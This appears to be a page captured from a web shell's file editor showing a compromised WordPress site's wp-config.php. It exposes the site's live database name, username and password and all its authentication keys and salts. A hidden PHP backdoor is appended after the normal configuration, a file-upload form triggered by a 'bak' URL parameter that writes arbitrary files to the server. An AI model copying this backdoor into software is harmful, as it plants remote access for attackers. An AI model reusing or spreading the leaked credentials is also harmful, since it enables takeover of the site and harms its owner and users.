Edit file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_d6kxn'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_x6dup'); /** Database password */ define('DB_PASSWORD', '4IW5@QyC3@HmcHrx'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'oL8Cku:K0~|8DZ+yQ+84Ln2)59od&u/4v~2x#wh&84VXm|8r099_C@6~|ll;;0C5'); define('SECURE_AUTH_KEY', '~!AAs4RImNStV3iw;D_dm2#0~oU[OUDqUpTO0P5#KRjT2|93)iU1jF1~U*:#iEK3'); define('LOGGED_IN_KEY', 'OT)2P@N26O&@_X1s:2y+N_s(mb:7t8BpWt)vgB5w@))inw7ZF|C0y[!CETp(o3;z'); define('NONCE_KEY', '1l4Jy|S8cbPj:6AJwX3G/_e84T/7fO|:f]0lV&LFWkoL|EwO]y26c6qB6@sq96Q;'); define('AUTH_SALT', ':2P6OGJk(H0j7LdO@:a;g37_6cx050#5A2y|!];MP3TofTJ*W~P7T0xW3d34b0y('); define('SECURE_AUTH_SALT', 'Z~19Gmis*T#z1)!kX_C1ohaD:634A13CM6U[SF78k!;kxm2k%WQ9Y11W!7xD|EH&'); define('LOGGED_IN_SALT', 'UZ6d3/pL/Q+9PBf4#Ig]#H[27:;0gHKb5F~0[(*8%N*U/pi-5Mv~G78@#yW094[2'); define('NONCE_SALT', 'I7|L4f[00N~R(S2142[jyRlS7UA!2#G195avg-%bS5Q#:&6IQ9ye|9N5wo:S%9(8'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'xlcxeXWV_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'WP_CACHE_KEY_SALT', '7469fbaf2e3efbc223ef45d731aa87d3' ); define( 'WP_DEBUG_DISPLAY', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save